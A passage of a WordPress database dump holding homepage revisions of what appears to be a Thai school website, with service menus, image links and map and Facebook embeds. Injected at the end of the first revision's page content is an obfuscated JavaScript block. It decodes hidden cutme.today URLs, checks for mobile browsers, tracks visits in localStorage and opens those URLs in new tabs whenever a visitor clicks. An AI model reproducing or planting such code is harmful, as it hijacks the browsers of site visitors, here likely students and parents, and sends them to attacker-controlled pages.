#ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://pakheang.my.canva.site/docmentorderv2\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-09-11 14:44:58','2025-09-11 07:44:58','',14,'http://pakhaeng.ssk.in.th/?p=2045',0,'revision','',0),
(2046,1,'2025-09-11 14:45:38','2025-09-11 07:45:38','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"9f7ee323\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1e35ff-0d\",\"ids\":[2026,2039],\"type\":\"fluidcarousel\",\"imageRatio\":\"inherit\",\"gutter\":[26,\"\",\"\"],\"carouselHeight\":[423,\"\",\"\"],\"autoPlay\":true,\"transSpeed\":1240,\"imagesDynamic\":[{\"id\":2026,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2026\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1024x410.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"width\":1024,\"height\":410},{\"id\":2039,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2039\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-1024x512.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"width\":750,\"height\":375}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 